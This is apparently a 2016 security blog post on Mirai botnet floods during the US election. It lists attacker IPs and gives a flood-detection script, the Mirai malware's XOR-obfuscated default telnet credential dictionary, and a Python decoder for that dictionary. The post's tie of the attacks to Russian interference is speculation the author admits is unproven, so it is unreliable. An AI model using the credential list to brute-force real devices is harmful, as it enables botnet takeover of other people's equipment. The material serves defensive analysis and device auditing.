The US Election and Mirai BotNetz

(screenshot, 2016-11-10)

November 8th, US Elections and the massive Sh#tstorm – Mirai

While people went to the polls (and nearly killed each other) on November 8, we witnessed the biggest (seemingly coordinated) Mirai botnet attack on the US to date. To be honest, it was not as big as the 1 Tbps DDoS attacks seen previously, but it seemed to target the election, with the (assumed) intention of disrupting election communications. As people cast their votes on election day, Wikileaks pushed its propaganda through more than 78,000 accounts (Sociobots posting in English and Russian) about how Clinton was bad and Trump was the best thing since sliced bread. These social media flows of anti-candidate (targeted?) messaging were in full force on the east coast, and interestingly some of the affected areas were swing states that were being hammered by attacks from Mirai botnets and various other disruptions (or so it would seem). The attacks picked up in the morning at 9 AM and continued in waves, spiking at 40 Gbps (far short of the roughly 620 Gbps that hit the Krebs on Security website).

The attacks got worse, encompassing multiple services, just like the other UDP/ICMP attacks we saw a short time ago that were also attributed to the Mirai botnet (telnet and HTTP). At their peak the attacks reached 25 million requests/queries sent from just over 12,000 attacking hosts: not 100K, not 1 million, just 12,000. I am sure some fancy "uber cyber" companies have previously talked about "millions" of attackers, but that just isn't the case in reality (not for dedicated attacks, anyway). If we did face an attack with 20K or more sources, imagine what could happen; I don't even want to think about that.

To understand the risk the Mirai botnet poses, let's take a look at a simple Shodan query for telnet services. Such services can be queried (or indexed by crawlers) in various ways; in this case we use Shodan.

(screenshot: Shodan results for internet-visible telnet services, by country, 2016-11-16)

The image above shows, by country, how many telnet services Shodan's crawlers found visible on the internet. The total goes beyond 3 million. This does not mean that every node or service discovered is infected with a Mirai payload, but the sheer number of devices is impressive. If, in theory, one million of these devices were infected (and the potential is much higher), we really would see a botnet capable of well over 1 Tbps of DDoS traffic.

The attacks were very methodical, aimed at disruption rather than full takedowns, and interestingly often hit states where voting was going on and was still not in Trump's favor. Was it political? (I don't have conclusive evidence of that.) The answer is I don't know for sure, and forensics is a very tedious process that can take months of going through data and qualifying what exactly happened (and whether that data is even complete enough). But I will continue to analyze and dissect the attack data and payloads to see where the differences are, and whether any specific attack strategy can be seen and proven to point in a definitive direction or to specific threat actor(s).

An interesting finding is that the Mirai payloads indicate Russian roots (in some cases) and have also found their way to China (first signs in forums). That the latest attacks come ONLY from there is highly unlikely, because the original threat actor made sure the code was dispersed so that multiple botnets would be built. The 12,000 attackers are also spread across Asia, EMEA and the USA, so the actual operators could be in any of these regions (we have no conclusive proof of origin, only indicators).


On another note, there may be signs that Russia and China were at the very least part of the attacks, since we found attackers from those countries, the origin was also there, and we found multiple signals that Wikileaks and Russian-sponsored attacker groups had been influencing Twitter and other social media outlets for at least the last few months. Many accounts that I tracked changed: Wikileaks had ca. 7,800 friends and 78K followers last week, and now has 7,612 friends and 75K+ followers. The change in numbers (seemingly) indicates that Sociobots were decommissioned after the "campaign" was successful. If this is indeed true, it highlights a new perspective on hybrid warfare.

(screenshot: hybrid warfare diagram, 2016-04-19)

As we see in the picture above, hybrid warfare also encompasses information warfare (in Sec. Clinton's case we can see this) and, in the attacks on Nov. 8, signs of cyber attacks. The other aspect, "propaganda", is interesting, as we now have indicators that Russia used a massive Sociobot network to push sentiment towards Trump. Whether the evidence verifies this remains to be seen. At any rate, the use of Sociobots is going to be a factor that impacts both nation-states and commercial customers, as they seem to be very effective at pushing parts of the masses in a specific direction. This also does not bode well for democracy, as it poses a threat to any nation-state, company or person that holds an opinion an attacker does not like. It's a dangerous precedent and will keep us all on our toes.

Some of the attacker IPs we found were:

Initial Attackers Seen
78.188.101.84
191.103.241.199
14.184.121.120
163.172.135.224
222.186.129.22
1.160.40.16
139.60.210.5
187.18.238.127
76.219.186.111
94.19.116.150
103.250.189.85
90.159.229.104
116.110.255.175
210.7.25.173
189.218.230.191

And later on some more:

additional attackers seen
118.176.67.39
187.156.39.7
78.188.22.8
121.67.41.109
59.14.187.192

All of these were using UDP and ICMP flooding, as well as various DNS niceties.
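The listed sources and the "UDP, ICMP flooding" description translate directly into a sensor-side check. The following is an added example (not code from the post or from the Hakdefnet sensors): it aggregates constructed flow records per source and protocol in fixed windows, flags UDP/ICMP sources above a packets-per-second threshold, marks which of them already appear in the page's attacker list, and emits drop rules. The flow format, the sample records, the threshold and the iptables rule shape are all assumptions made for the example.

```python
from collections import defaultdict

# Source addresses the post lists under "Initial Attackers Seen" (first five
# only), used here as a small indicator feed.
IOC_SOURCES = {
    "78.188.101.84", "191.103.241.199", "14.184.121.120",
    "163.172.135.224", "222.186.129.22",
}

# Constructed flow records (not real capture data) in a minimal text export:
# <epoch seconds> <src ip> <dst ip> <proto> <dst port> <packets>
# 1478613600 is 2016-11-08 14:00 UTC, i.e. 09:00 US Eastern.
SAMPLE_FLOWS = """\
1478613600 78.188.101.84 203.0.113.10 udp 53 90000
1478613600 78.188.101.84 203.0.113.10 icmp 0 45000
1478613605 14.184.121.120 203.0.113.10 udp 123 120000
1478613610 198.51.100.7 203.0.113.10 tcp 443 400
1478613611 198.51.100.7 203.0.113.10 tcp 443 380
1478613660 222.186.129.22 203.0.113.11 udp 53 70000
1478613660 192.0.2.55 203.0.113.11 udp 53 30
1478613670 203.0.113.99 203.0.113.11 icmp 0 61000
"""

FLOOD_PROTOS = {"udp", "icmp"}


def parse_flows(text):
    """Turn the text export into a list of dicts; blank lines are skipped."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, proto, dport, pkts = line.split()
        flows.append({"ts": int(ts), "src": src, "dst": dst,
                      "proto": proto.lower(), "dport": int(dport),
                      "packets": int(pkts)})
    return flows


def detect_floods(flows, window=60, pps_threshold=500, iocs=IOC_SOURCES):
    """Sum packets per (src, proto) in fixed windows and flag UDP/ICMP sources
    whose rate exceeds pps_threshold. One finding per (src, proto), keeping
    the worst window seen, sorted by rate."""
    buckets = defaultdict(int)
    for f in flows:
        if f["proto"] not in FLOOD_PROTOS:
            continue
        key = (f["src"], f["proto"], f["ts"] // window * window)
        buckets[key] += f["packets"]

    worst = {}
    for (src, proto, _start), pkts in buckets.items():
        pps = pkts / window
        if pps < pps_threshold:
            continue
        k = (src, proto)
        if k not in worst or pps > worst[k]["pps"]:
            worst[k] = {"src": src, "proto": proto, "pps": pps,
                        "known_ioc": src in iocs}
    return sorted(worst.values(), key=lambda x: -x["pps"])


def block_rules(findings):
    """One iptables DROP rule per offending source, deduplicated across protocols."""
    seen = []
    for f in findings:
        if f["src"] not in seen:
            seen.append(f["src"])
    return [f"iptables -I INPUT -s {src} -j DROP" for src in seen]


if __name__ == "__main__":
    findings = detect_floods(parse_flows(SAMPLE_FLOWS))
    for f in findings:
        tag = "known IOC" if f["known_ioc"] else "new source"
        print(f'{f["src"]:16} {f["proto"]:5} {f["pps"]:8.0f} pps  ({tag})')
    print("\n".join(block_rules(findings)))
```

Note the last sample source (203.0.113.99) is flagged by rate alone even though it is not in the indicator list: that is the point of pairing a behavioural threshold with an IOC feed, since a botnet of 12,000 hosts will always contain addresses nobody has published yet.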

This data is also in our CyberNsight system and can be collected, as well as blocked, by our CyberVUE sensors.

(screenshot: scan of one of the attackers)

Some of the networks that were attacked include T-Mobile, Sprint and Level3.

(screenshot: AT&T)

(screenshot: T-Mobile)

(screenshot: example of some hit areas)

For more information about our solutions and partners (we did not collect this information without help), please write to us or contact us.

Please note! We work together with the most dedicated security researchers in the world; any report is a summation of dedicated, hard work by multiple individuals. I want to personally thank all Hacker Defense Network members and partners, without whom this would not have been possible.

Your 1D10T

Security Noob

(as always copyright Hakdefnet 2016)

References for additional research on Mirai:

http://malwaremustdie.org

https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/

http://securityaffairs.co/wordpress/50929/malware/linux-mirai-elf.html

(example hardcoded passwords from Mirai Botnet code released by anna-senpai)

The Mirai botnet scans for IoT devices with telnet exposed on port 23 (and 2323) and tries a built-in list of default, hardcoded credentials against them; the list is drawn from known vulnerable devices that ship with these passwords.

I have included part of the code so that you can see which passwords it already has and is searching for. The strings are obfuscated in the source with a byte-wise XOR (the table key is 0xDEADBEEF, which collapses to a single XOR with 0x22), and the third argument is a weight that controls how often the scanner tries that pair. (To be clear!) I am not saying use this to breach devices, but that if you are using any of these credentials, chances are your device could be infected and used in DDoS attacks on others.

// Set up passwords
add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x41\x11\x17\x13\x13", 10); // root xc3511
add_auth_entry("\x50\x4D\x4D\x56", "\x54\x4B\x58\x5A\x54", 9); // root vizxv
add_auth_entry("\x50\x4D\x4D\x56", "\x43\x46\x4F\x4B\x4C", 8); // root admin
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C", 7); // admin admin
add_auth_entry("\x50\x4D\x4D\x56", "\x1A\x1A\x1A\x1A\x1A\x1A", 6); // root 888888
add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x4F\x4A\x46\x4B\x52\x41", 5); // root xmhdipc
add_auth_entry("\x50\x4D\x4D\x56", "\x46\x47\x44\x43\x57\x4E\x56", 5); // root default
add_auth_entry("\x50\x4D\x4D\x56", "\x48\x57\x43\x4C\x56\x47\x41\x4A", 5); // root juantech
add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16\x17\x14", 5); // root 123456
add_auth_entry("\x50\x4D\x4D\x56", "\x17\x16\x11\x10\x13", 5); // root 54321
add_auth_entry("\x51\x57\x52\x52\x4D\x50\x56", "\x51\x57\x52\x52\x4D\x50\x56", 5); // support support
add_auth_entry("\x50\x4D\x4D\x56", "", 4); // root (none)
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x52\x43\x51\x51\x55\x4D\x50\x46", 4); // admin password
add_auth_entry("\x50\x4D\x4D\x56", "\x50\x4D\x4D\x56", 4); // root root
add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16\x17", 4); // root 12345
add_auth_entry("\x57\x51\x47\x50", "\x57\x51\x47\x50", 3); // user user
add_auth_entry("\x43\x46\x4F\x4B\x4C", "", 3); // admin (none)
add_auth_entry("\x50\x4D\x4D\x56", "\x52\x43\x51\x51", 3); // root pass
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C\x13\x10\x11\x16", 3); // admin admin1234
add_auth_entry("\x50\x4D\x4D\x56", "\x13\x13\x13\x13", 3); // root 1111
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x51\x4F\x41\x43\x46\x4F\x4B\x4C", 3); // admin smcadmin
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x13\x13\x13", 2); // admin 1111
add_auth_entry("\x50\x4D\x4D\x56", "\x14\x14\x14\x14\x14\x14", 2); // root 666666
add_auth_entry("\x50\x4D\x4D\x56", "\x52\x43\x51\x51\x55\x4D\x50\x46", 2); // root password
add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16", 2); // root 1234
add_auth_entry("\x50\x4D\x4D\x56", "\x49\x4E\x54\x13\x10\x11", 1); // root klv123
add_auth_entry("\x63\x46\x4F\x4B\x4C\x4B\x51\x56\x50\x43\x56\x4D\x50", "\x4F\x47\x4B\x4C\x51\x4F", 1); // Administrator meinsm (the released source's comment says "admin"; the bytes decode to "meinsm")
add_auth_entry("\x51\x47\x50\x54\x4B\x41\x47", "\x51\x47\x50\x54\x4B\x41\x47", 1); // service service
add_auth_entry("\x51\x57\x52\x47\x50\x54\x4B\x51\x4D\x50", "\x51\x57\x52\x47\x50\x54\x4B\x51\x4D\x50", 1); // supervisor supervisor
add_auth_entry("\x45\x57\x47\x51\x56", "\x45\x57\x47\x51\x56", 1); // guest guest
add_auth_entry("\x45\x57\x47\x51\x56", "\x13\x10\x11\x16\x17", 1); // guest 12345
add_auth_entry("\x45\x57\x47\x51\x56", "\x13\x10\x11\x16\x17", 1); // guest 12345 (duplicated in the released source, which doubles its weight)
add_auth_entry("\x43\x46\x4F\x4B\x4C\x13", "\x52\x43\x51\x51\x55\x4D\x50\x46", 1); // admin1 password
add_auth_entry("\x43\x46\x4F\x4B\x4C\x4B\x51\x56\x50\x43\x56\x4D\x50", "\x13\x10\x11\x16", 1); // administrator 1234
add_auth_entry("\x14\x14\x14\x14\x14\x14", "\x14\x14\x14\x14\x14\x14", 1); // 666666 666666
add_auth_entry("\x1A\x1A\x1A\x1A\x1A\x1A", "\x1A\x1A\x1A\x1A\x1A\x1A", 1); // 888888 888888
add_auth_entry("\x57\x40\x4C\x56", "\x57\x40\x4C\x56", 1); // ubnt ubnt
add_auth_entry("\x50\x4D\x4D\x56", "\x49\x4E\x54\x13\x10\x11\x16", 1); // root klv1234
add_auth_entry("\x50\x4D\x4D\x56", "\x78\x56\x47\x17\x10\x13", 1); // root Zte521
add_auth_entry("\x50\x4D\x4D\x56", "\x4A\x4B\x11\x17\x13\x1A", 1); // root hi3518
add_auth_entry("\x50\x4D\x4D\x56", "\x48\x54\x40\x58\x46", 1); // root jvbzd
add_auth_entry("\x50\x4D\x4D\x56", "\x43\x4C\x49\x4D", 4); // root anko
add_auth_entry("\x50\x4D\x4D\x56", "\x58\x4E\x5A\x5A\x0C", 1); // root zlxx.
add_auth_entry("\x50\x4D\x4D\x56", "\x15\x57\x48\x6F\x49\x4D\x12\x54\x4B\x58\x5A\x54", 1); // root 7ujMko0vizxv
add_auth_entry("\x50\x4D\x4D\x56", "\x15\x57\x48\x6F\x49\x4D\x12\x43\x46\x4F\x4B\x4C", 1); // root 7ujMko0admin
add_auth_entry("\x50\x4D\x4D\x56", "\x51\x5B\x51\x56\x47\x4F", 1); // root system
add_auth_entry("\x50\x4D\x4D\x56", "\x4B\x49\x55\x40", 1); // root ikwb
add_auth_entry("\x50\x4D\x4D\x56", "\x46\x50\x47\x43\x4F\x40\x4D\x5A", 1); // root dreambox
add_auth_entry("\x50\x4D\x4D\x56", "\x57\x51\x47\x50", 1); // root user
add_auth_entry("\x50\x4D\x4D\x56", "\x50\x47\x43\x4E\x56\x47\x49", 1); // root realtek
add_auth_entry("\x50\x4D\x4D\x56", "\x12\x12\x12\x12\x12\x12\x12\x12", 1); // root 00000000
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x13\x13\x13\x13\x13\x13", 1); // admin 1111111
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x10\x11\x16", 1); // admin 1234
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x10\x11\x16\x17", 1); // admin 12345
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x17\x16\x11\x10\x13", 1); // admin 54321
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x10\x11\x16\x17\x14", 1); // admin 123456
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x15\x57\x48\x6F\x49\x4D\x12\x43\x46\x4F\x4B\x4C", 1); // admin 7ujMko0admin
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x16\x11\x10\x13", 1); // admin 4321 (the released source's comment says "1234"; the bytes decode to "4321")
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x52\x43\x51\x51", 1); // admin pass
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x4F\x47\x4B\x4C\x51\x4F", 1); // admin meinsm
add_auth_entry("\x56\x47\x41\x4A", "\x56\x47\x41\x4A", 1); // tech tech
add_auth_entry("\x4F\x4D\x56\x4A\x47\x50", "\x44\x57\x41\x49\x47\x50", 1); // mother f##ker
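Rather than trusting the trailing comments, the table above can be decoded mechanically. The following is an added example, not code from the post or from the Mirai source: it parses a constructed subset of the add_auth_entry() lines (copied as they appear in the released scanner.c, with the source's own comments), reverses the XOR obfuscation using the table key from Mirai's table.c, reports comments that disagree with the decoded bytes, checks a user/password pair against the dictionary, and computes how often the scanner would try that pair given the weights. The regular expression and the function names are the example's own.

```python
import re

# Mirai's table_key from table.c. scanner.c's deobf() XORs every byte of the
# string with each of the four key bytes in turn, which collapses to one byte.
TABLE_KEY = 0xDEADBEEF
KEY_BYTE = ((TABLE_KEY & 0xFF) ^ ((TABLE_KEY >> 8) & 0xFF)
            ^ ((TABLE_KEY >> 16) & 0xFF) ^ ((TABLE_KEY >> 24) & 0xFF))  # 0x22

# A constructed subset of the add_auth_entry() lines, copied as they appear in
# the released scanner.c, including the source's own (not always accurate)
# trailing comments.
SAMPLE_SOURCE = r'''
add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x41\x11\x17\x13\x13", 10); // root xc3511
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C", 7); // admin admin
add_auth_entry("\x50\x4D\x4D\x56", "", 4); // root (none)
add_auth_entry("\x63\x46\x4F\x4B\x4C\x4B\x51\x56\x50\x43\x56\x4D\x50", "\x4F\x47\x4B\x4C\x51\x4F", 1); // Administrator admin
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x16\x11\x10\x13", 1); // admin 1234
add_auth_entry("\x45\x57\x47\x51\x56", "\x13\x10\x11\x16\x17", 1); // guest 12345
add_auth_entry("\x45\x57\x47\x51\x56", "\x13\x10\x11\x16\x17", 1); // guest 12345
'''

# user literal, password literal, weight, trailing comment
ENTRY_RE = re.compile(
    r'add_auth_entry\("((?:\\x[0-9A-Fa-f]{2})*)",\s*"((?:\\x[0-9A-Fa-f]{2})*)",'
    r'\s*(\d+)\);\s*//\s*(.*?)\s*$',
    re.MULTILINE,
)


def c_escapes_to_bytes(s):
    """'\\x50\\x4D' -> b'PM'; only \\xHH escapes occur in these tables."""
    return bytes(int(h, 16) for h in re.findall(r'\\x([0-9A-Fa-f]{2})', s))


def deobf(s):
    """Decode one obfuscated C string literal body to plaintext."""
    return bytes(b ^ KEY_BYTE for b in c_escapes_to_bytes(s)).decode("ascii")


def parse_auth_entries(source):
    """Return [(user, password, weight), ...] in file order."""
    return [(deobf(u), deobf(p), int(w)) for u, p, w, _ in ENTRY_RE.findall(source)]


def find_comment_mismatches(source):
    """Entries whose '// user pass' comment disagrees with the decoded strings."""
    out = []
    for u, p, _, comment in ENTRY_RE.findall(source):
        user, pw = deobf(u), deobf(p)
        if comment != f"{user} {pw or '(none)'}":
            out.append((user, pw, comment))
    return out


def is_mirai_credential(user, password, entries):
    """True if the exact user/password pair is in the scanner dictionary."""
    return any(u == user and p == password for u, p, _ in entries)


def pick_probability(user, password, entries):
    """Share of login attempts that use this pair: random_auth_entry() draws
    proportionally to the weight argument, and duplicate lines add up."""
    total = sum(w for _, _, w in entries)
    hit = sum(w for u, p, w in entries if u == user and p == password)
    return hit / total if total else 0.0


if __name__ == "__main__":
    entries = parse_auth_entries(SAMPLE_SOURCE)
    for user, pw, w in entries:
        print(f"{w:3}  {user}:{pw or '(none)'}")
    print("comment mismatches:", find_comment_mismatches(SAMPLE_SOURCE))
    print("root/xc3511 share:", pick_probability("root", "xc3511", entries))
```

Feeding the complete table into parse_auth_entries() gives a ready-made list to test your own devices' telnet logins against; decoding the bytes rather than reading the comments matters because the released file labels two pairs wrongly (Administrator/meinsm and admin/4321), which the mismatch check above surfaces.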